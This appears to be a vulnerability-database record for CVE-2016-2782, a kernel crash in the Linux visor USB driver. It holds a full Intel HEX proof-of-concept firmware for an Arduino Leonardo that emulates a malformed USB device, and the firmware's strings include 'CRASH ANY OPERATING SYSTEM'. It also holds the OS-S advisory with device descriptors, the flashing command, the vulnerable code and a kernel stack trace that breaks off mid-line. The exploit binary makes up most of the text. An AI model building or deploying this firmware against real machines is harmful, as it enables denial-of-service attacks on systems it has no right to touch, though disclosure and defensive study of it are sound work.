\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132 \n:1007F000609170057091710540916E0550916F0583 \n:1008000064177507ACF49091E8009570E1F390914E \n:10081000E80092FD1CC0A093F100A0917005B0917A \n:1008200071051196AF73BB27AB2B11F48093E800D1 \n:10083000A0917005B09171051196B0937105A093C8 \n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC \n:100850009FEFDF91CF911F910F91FF9008951F920D \n:100860000F920FB60F9211246F927F928F929F92E8 \n:10087000AF92BF92CF92DF92EF92FF920F931F93AE \n:100880002F933F934F935F936F937F938F939F9398 \n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 \n:1008A0006297DEBFCDBF1092E9008091E80083FF20 \n:1008B00046C168E0CE010A960E94C80382EF809389 \n:1008C000E8009A8597FF05C08091E80080FFFCCF83 \n:1008D00003C08EEF8093E800892F807609F023C152 \n:1008E0008B85811105C01092F1001092F10020C19A \n:1008F000282F2D7F213009F41BC1853049F48091C8 \n:10090000E80080FFFCCF8C8580688093E30010C1F5 \n:10091000863009F0E1C02D8508891989223009F057 \n:10092000B3C0EC848E2D90E0209173053091740556 \n:10093000821793070CF09FC00E94D5031F92EF927D \n:100940008DE394E09F938F930E9483068CE0E89E52 \n:1009500070011124E0917505F0917605EE0DFF1DF3 \n:1009600089E0DE01119601900D928A95E1F7C801A8 \n:100970000E94D50349E050E0BE016F5F7F4F80E0E9 \n:100980000E94E0030F900F900F900F90C12CD12C7C \n:10099000612C712C33E7A32E34E0B32E4AEA842E67 \n:1009A00044E0942EE0917505F0917605EE0DFF1D63 \n:1009B000818590E0681679060CF0BAC07F926F923C \n:1009C000BF92AF920E948306E0917505F091760583 \n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 \n:1009E00080E00E94E0030F900F900F900F9000E0C6 \n:1009F00010E0E0917505F0917605EE0DFF1D028483 \n:100A0000F385E02DEC0DFD1D818590E00817190799 \n:100A10005CF51F930F939F928F920E948306E09143 \n:100A20007505F0917605EE0DFF1D0284F385E02D2E \n:100A3000EC0DFD1DC801880F991FA485B585A80F71 \n:100A4000B91F4D915C910284F385E02DE80FF91FE9 \n:100A50006081718180E00E94E0030F5F1F4F0F9063 \n:100A60000F900F900F90C5CF8FEF681A780A8EE025 \n:100A7000C80ED11C97CF8FED94E09F938F930E9467 \n:100A800083060F900F9058C0C8012A8B0E94D5038F \n:100A90002A892130C1F0233009F04EC08C851F9285 \n:100AA0008F9389EF94E09F938F930E94830642E097 \n:100AB00050E062E871E080E00E94E0030F900F9048 \n:100AC0000F900F9035C04091000150E060E071E060 \n:100AD00080E00E94E0032CC0873071F1883021F45F \n:100AE00081E08093F10024C0893011F5937021F5E5 \n:100AF000EDE4F1E081E021E096E38093E9002093CA \n:100B0000EB0034913093EC009093ED008F5F3196C1 \n:100B1000843099F78EE78093EA001092EA008C8582 \n:100B20008093720505C0888999890E94D50304C005 \n:100B30008EEF8093E80003C081E28093EB00629621 \n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE \n:100B5000EF91BF91AF919F918F917F916F915F9135 \n:100B60004F913F912F911F910F91FF90EF90DF9048 \n:100B7000CF90BF90AF909F908F907F906F900F908D \n:100B80000FBE0F901F9018951F920F920FB60F92E5 \n:100B900011248F939F938091E1001092E10083FFD5 \n:100BA0000FC01092E90091E09093EB001092EC00DE \n:100BB00092E39093ED001092720598E09093F0000C \n:100BC00082FF1AC080917E05882339F080917E05CE \n:100BD000815080937E05882369F080917D0588236C \n:100BE00059F080917D05815080937D05811104C06D \n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE \n:100C00000F901F901895CF93DF93CDB7DEB782E199 \n:100C1000FE013596A0E0B1E001900D928A95E1F7D2 \n:100C20008F89988D9093760580937505898D9A8D1F \n:100C300090937405809373058B8D9C8D90937C05A8 \n:100C400080937B058D8D9E8D90937A058093790599 \n:100C50008F8D98A1909378058093770510927205F7 \n:100C600081E08093D70080EA8093D80082E189BD3B \n:100C700009B400FEFDCF61E070E080E090E00E94EA \n:100C80007B0280E98093D8008CE08093E200109290 \n:100C9000E000559A209ADF91CF91089581E08093EA \n:100CA000E00008959091C80095FFFCCF8093CE009E \n:100CB00008951092CD0087E68093CC0088E1809360 \n:100CC000C9008EE08093CA0008950F931F93CF93BD \n:100CD000DF93EC018C01FE0101900020E9F73197D0 \n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E \n:100CF000F80181918F010E945206EDCFDF91CF91D3 \n:100D00001F910F910895CF93DF93CDB7DEB7DA959A \n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 \n:100D2000419151919F0160E071E0CE0101960E94D6 \n:100D30000707CE0101960E946506D3950FB6F89479 \n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE \n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 \n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E \n:100D70003F932F9389839A830E9483068981882ECB \n:100D80009A81992E0F900F9000E010E08EE5E82EEA \n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 \n:100DA000E4F4F40181914F0190E09F938F93FF92BF \n:100DB000EF920E9483060F5F1F4FC8018F70992723 \n:100DC0000F900F900F900F90892B41F7DF92CF92E9 \n:100DD0000E9483060F900F90E1CF81E194E09F93F2 \n:100DE0008F930E9483060F900F900F900F90DF91CA \n:100DF000CF911F910F91FF90EF90DF90CF90BF9018 \n:100E0000AF909F908F900895F8940C94E809AEE00D \n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 \n:100E20004C831A83098377FF02C060E070E8615049 \n:100E300071097E836D83A901BC01CE0101960E94D8 \n:100E400033074D815E8157FD0AC02F8138854217D7 \n:100E500053070CF49A01F801E20FF31F10822E964B \n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB \n:100E7000B1097C016B018A01FC0117821682838112 \n:100E800081FFBDC1CE0101964C01F7019381F601AE \n:100E900093FD859193FF81916F01882309F4ABC184 \n:100EA000853239F493FD859193FF81916F018532ED \n:100EB00029F4B70190E00E941B09E7CF512C312C97 \n:100EC00020E02032A0F48B3269F030F4803259F007 \n:100ED000833269F420612CC08D3239F0803339F4CB \n:100EE000216026C02260246023C0286021C027FD25 \n:100EF00027C030ED380F3A3078F426FF06C0FAE00C \n:100F00005F9E300D1124532E13C08AE0389E300DA1 \n:100F10001124332E20620CC08E3221F426FD6BC1C9 \n:100F2000206406C08C3611F4206802C0883641F473 \n:100F3000F60193FD859193FF81916F018111C1CFDE \n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B \n:100F5000F9830DC0833631F0833771F0833509F0A2 \n:100F60005BC022C0F801808189830E5F1F4F44243B \n:100F70004394512C540115C03801F2E06F0E711CDE \n:100F8000F801A080B18026FF03C0652D70E002C08B \n:100F90006FEF7FEFC5012C870E9410092C018301A0 \n:100FA0002C852F77222E17C03801F2E06F0E711CAE \n:100FB000F801A080B18026FF03C0652D70E002C05B \n:100FC0006FEF7FEFC5012C870E9405092C012C854E \n:100FD0002068222E830123FC1BC0832D90E048163D \n:100FE0005906B0F4B70180E290E00E941B093A94E0 \n:100FF000F4CFF50127FC859127FE81915F01B701B0 \n:1010000090E00E941B0931103A94F1E04F1A510808 \n:101010004114510471F7E5C0843611F0893639F571 \n:10102000F80127FF07C060817181828193810C5F85 \n:101030001F4F08C060817181882777FD8095982FA8 \n:101040000E5F1F4F2F76B22E97FF09C090958095A7 \n:10105000709561957F4F8F4F9F4F2068B22E2AE089 \n:1010600030E0A4010E944D09A82EA81844C085377D \n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E \n:10108000BF2E8F36C1F018F4883579F0B4C08037A0 \n:1010900019F0883721F0AFC02F2F2061B22EB4FE97 \n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D \n:1010B0009660B92E06C028E030E005C020E130E09F \n:1010C00002C020E132E0F801B7FE07C06081718103 \n:1010D000828193810C5F1F4F06C06081718180E027 \n:1010E00090E00E5F1F4FA4010E944D09A82EA81882 \n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 \n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 \n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 \n:10112000FE01EA0DF11D8081803311F4297E09C092 \n:1011300022FF06C07394739404C0822F867809F04E \n:10114000739423FD13C020FF06C05A2C731418F4A7 \n:10115000530C5718732C731468F4B70180E290E0B5 \n:101160002C870E941B0973942C85F5CF731410F4FF \n:10117000371801C0312C24FF12C0B70180E390E082 \n:101180002C870E941B092C8522FF17C021FF03C05A \n:1011900088E590E002C088E790E0B7010CC0822F9C \n:1011A000867859F021FD02C080E201C08BE227FD64 \n:1011B0008DE2B70190E00E941B09A51438F4B70135 \n:1011C00080E390E00E941B095A94F7CFAA94F4019F \n:1011D000EA0DF11D8081B70190E00E941B09A1106A \n:1011E000F5CF332009F451CEB70180E290E00E94A0 \n:1011F0001B093A94F6CFF7018681978102C08FEFE1 \n:101200009FEF2C96E2E10C94CD09FC010590615012 \n:1012100070400110D8F7809590958E0F9F1F08950C \n:10122000FC016150704001900110D8F780959095B5 \n:101230008E0F9F1F08950F931F93CF93DF93182F47 \n:10124000092FEB018B8181FD03C08FEF9FEF20C041 \n:1012500082FF10C04E815F812C813D814217530770 \n:101260007CF4E881F9819F012F5F3F4F3983288308 \n:10127000108306C0E885F985812F0995892B29F708 \n:101280002E813F812F5F3F4F3F832E83812F902FF1 \n:10129000DF91CF911F910F910895FA01AA2728306D \n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 \n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF \n:1012C000781F891F9A1FA11D680F791F8A1F911D02 \n:1012D000A11D6A0F711D811D911DA11D20D009F452 \n:1012E00068943F912AE0269F11243019305D319394 \n:1012F000DEF6CF010895462F4770405D4193B3E07D \n:101300000FD0C9F7F6CF462F4F70405D4A3318F023 \n:10131000495D31FD4052419302D0A9F7EACFB4E0D4 \n:10132000A6959795879577956795BA95C9F700978C \n:101330006105710508959B01AC010A2E069457952D \n:10134000479537952795BA95C9F7620F731F841F84 \n:10135000951FA01D0895EE0FFF1F0590F491E02D3D \n:1013600009942F923F924F925F926F927F928F9249 \n:101370009F92AF92BF92CF92DF92EF92FF920F9324 \n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E \n:10139000F894DEBF0FBECDBF09942A8839884888EB \n:1013A0005F846E847D848C849B84AA84B984C88481 \n:1013B000DF80EE80FD800C811B81AA81B981CE0F78 \n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D \n:0413D000F894FFCFBF \n:1013D4001201000200000040AD0BEFBE000101024B \n:1013E4000001220342006100640020004200410029 \n:1013F40042004500250078002500780025006E0095 \n:1014040025007000180342004100440020004300FE \n:10141400300046004600450045002100120100024C \n:10142400000000402D08000200010102030109022E \n:10143400270001010000FA0705810304040C0705D5 \n:10144400010204000C0705820104000C07000700D8 \n:101454000700480100500072006F006C00690066CC \n:101464000069006300000A550000006BFD180A00C3 \n:10147400809F0AB901312B940A8101128946001315 \n:10148400000257028B0A5E0AF80A5F01F212010099 \n:1014940002010000400D055702000101020301B9D9 \n:1014A4000A0100F80A5F0A810A220342006100640B \n:1014B400002000420041004200450025007800253C \n:1014C40000780025006E00250070001803420041DA \n:1014D400004400200043003000460046004500451B \n:1014E40000210012010002010000400D0557020016 \n:1014F400010102030109040000030100000003F2DA \n:101504000AEC0A0902270001010000FA01AB0A09EA \n:101514000400000301000000090200202020202014 \n:101524005F5F5F5F5F5F5F5F2020202020202020BF \n:1015340020202020202020202020202020202020A7 \n:1015440020205F5F5F5F5F205F5F20205F2020209F \n:101554002020205F5F0A0D00202020202F205F5FC5 \n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 \n:101574005F5F20205F5F5F5F5F20202020202F209F \n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 \n:10159400202F5F5F0A0D002020202F202F202020E5 \n:1015A4002F205F5F205C2F205F5F20602F205F5F14 \n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A \n:1015C400205C2F205F5F2F202F205F5F5F2F202F55 \n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 \n:1015E4002F202F202F202F5F2F202F202F5F2F2001 \n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 \n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD \n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 \n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F \n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 \n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 \n:101654003C3C2043485241534820414E59204F506E \n:1016640045524154494E472053595354454D203E09 \n:101674003E0A0D00203C3C202863292053657267F4 \n:10168400656A20536368756D696C6F20323031353B \n:101694002C204F70656E536F7572636520536563BC \n:1016A40075726974792052616C66205370656E6E30 \n:1016B4006562657267203E3E0A0D000A3E3E205078 \n:1016C4007265737320627574746F6E20746F207307 \n:1016D4007461727420657865637574696F6E2E2EFB \n:1016E4002E0A0D005B44454255475D2045786563ED \n:1016F400757465207061796C6F616420300A0D0027 \n:10170400526563762D446174613A0A0D005B444569 \n:101714004255475D200953656E6420436F6E6669C8 \n:101724006775726174696F6E44657363726970740E \n:101734006F720928696E6465783A2569292E2E2E00 \n:101744000D0A005B44454255475D200953656E64AC \n:1017540020496E74657266616365204465736372C3 \n:101764006970746F720928696E7465726661636565 \n:101774003A2569292E2E2E0D0A005B444542554711 \n:101784005D200953656E6420456E64706F696E74E4 \n:101794002044657363726970746F720928656E649E \n:1017A400706F696E743A2569292E2E2E0D0A005B1E \n:1017B40044454255475D203C3C70616E6963206D31 \n:1017C4006F64653F3E3E0D0A005B44454255475DEC \n:1017D4002009203E3E20537472696E67204465736D \n:1017E40063726970746F72207265717565737420A9 \n:1017F4002D2073656E64696E67206D616C666F720F \n:101804006D656420737472696E67212073657475E5 \n:10181400702E7756616C75654C203D3D2025690D11 \n:101824000A005B48455844554D505D0A0D0025306B \n:041834003258200006 \n:00000001FF \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136142/OSS-2016-10_visor_treo_attach.txt", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "debiancve": [{"lastseen": "2023-11-27T15:10:36", "description": "The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2016-2782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2782"], "modified": "2016-04-27T17:59:00", "id": "DEBIANCVE:CVE-2016-2782", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2782", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntucve": [{"lastseen": "2023-11-28T15:16:57", "description": "The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel\nbefore 4.5 allows physically proximate attackers to cause a denial of\nservice (NULL pointer dereference and system crash) or possibly have\nunspecified other impact by inserting a USB device that lacks a (1) bulk-in\nor (2) interrupt-in endpoint.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1551395>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-29T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2782"], "modified": "2016-02-29T00:00:00", "id": "UB:CVE-2016-2782", "href": "https://ubuntu.com/security/CVE-2016-2782", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.10.0 (CentOS RHEL 7.1) - visor treo_attach Nullpointer Dereference", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "exploitpack", "title": "Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor treo_attach Nullpointer Dereference", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2782"], "modified": "2016-03-09T00:00:00", "id": "EXPLOITPACK:AA6ABBE8E5BE3C243DF38A29FC076191", "href": "", "sourceData": "OS-S Security Advisory 2016-10\nLinux visor (treo_attach) Nullpointer Dereference\n\nDate: March 4th, 2016\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\nCVE: CVE-2016-2782\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (visor treo_attach driver)\nSeverity: Critical. The Kernel panics. A reboot is required.\nEase of Exploitation: Trivial\nVulnerability type: Wrong input validation\nProducts: RHEL 7.1 including all updates\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\nVendor: Red Hat\nVendor contacted: November, 12th 2015\nPDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf\n\nAbstract:\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \ndevice requiring the visor (treo_attach) driver.\n\nDetailed product description:\nWe confirmed the bug on the following system:\nRHEL 7.1\nKernel 3.10.0-229.20.1.el7.x86_64\nFurther products or kernel versions have not been tested.\nHow reproducible: Always\nActual results: Kernel crashes.\n\nDescription:\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor:\n\n[*] Device-Descriptor\nbLength:\t0x12\nbDescriptorType:\t0x1\nbcdUSB:\t0x200\nbDeviceClass:\t0x3\nbDeviceSubClass:\t0x0\nbDeviceProtocol:\t0x0\nbMaxPacketSize:\t0x40\nidVendor:\t0x82d\nidProduct:\t0x200\nbcdDevice:\t0x100\niManufacturer:\t0x1\niProduct:\t0x2\niSerialNumbers:\t0x3\nbNumConfigurations:\t0x1\n\nThe treo_attach function does not use the num_ports (struct usb_serial) value \nfor any kind of sanity checks during the initialization process. Due to an \nincomplete sanity check, the driver could try to dereference a null-pointer if \na malformed device-descriptor is presented (zero-value for bNumEndpoints or no \nrequired endpoint-descriptors is provided).\nThis results in a crash of the system.\n\n****\n...\n554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \\ /* Possible \nNullpointer-Dereference */\n560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0);\n573\n574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL);\n575 if (!swap_port)\n576 return -ENOMEM;\n577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */\n578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */\n579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */\n...\n****\n\n[*] Configuration-Descriptor\nbLength:\t0x9\nbDescriptorType:\t0x2\nwTotalLength:\t0x27\nbNumInterfaces:\t0x1\nbConfigurationValue:\t0x1\niConfiguration:\t0x0\nbmAttributes:\t0x0\nbMaxPower:\t0x31\n[*] Interface-Descriptor\nbLength:\t0x9\nbDescriptorType:\t0x4\nbInterfaceNumber:\t0x0\nbAlternateSetting:\t0x0\nbNumEndpoints:\t0x3\nbInterfaceClass:\t0x0\nbInterfaceSubClass:\t0x0\nbInterfaceProtocol:\t0x0\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x81\t\nbmAttribut:\t0x3\t\nwMaxPacketSize:\t0x404\nbInterval:\t0xc\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x1\t\nbmAttribut:\t0x2\t\nwMaxPacketSize:\t0x4\nbInterval:\t0xc\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x82\t\nbmAttribut:\t0x1\nwMaxPacketSize:\t0x4\nbInterval:\t0xc\n\nProof of Concept:\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device.\n\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex\n\nThe firmware has been attached to this bug report.\nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3!\n\nSeverity and Ease of Exploitation:\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required.\n\nVendor Communication:\nWe contacted Red Hat on the November, 12th 2015.\nThis bug was fixed upstream. A CVE number was not assigned.\n\nReferences:\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283374\nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i\nd=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0\n\nKernel Stacktrace:\n\n[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd\n[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200\n[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3\n[ 35.417186] usb 1-1: Product: \u00c4?\n[ 35.421846] usb 1-1: Manufacturer: \u00c4?\n[ 35.425686] usb 1-1: SerialNumber: %\n[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc \nsays 96 microframes\n[ 35.493316] usbcore: registered new interface driver visor\n[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / \nPalm OS\n[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0\n[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5\n[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected\n[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at \n00000000000000b0\n[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]\n[ 35.543244] PGD 0 \n[ 35.543244] Oops: 0002 [#1] SMP \n[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \ndm_mirror dm_region_hash dm_log dm_mod\n[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1\n[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\n[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000\n[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>] \ntreo_attach+0x61/0x340 [visor]\n[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286\n[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2\n[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400\n[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400\n[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404\n[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400\n[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000\n[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\n[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: \n00000000000006f0\n[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000\n[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\n[ 35.543244] Stack:\n[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007\n[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400\n[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 \nffff88000bcd0090\n[ 35.543244] Call Trace:\n[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230\n[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0\n[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0\n[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0\n[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100\n[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\n[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\n[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0\n[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\n[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\n[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\n[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580\n[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff\n[ 35.543244] [<ffffffffa039801e>] 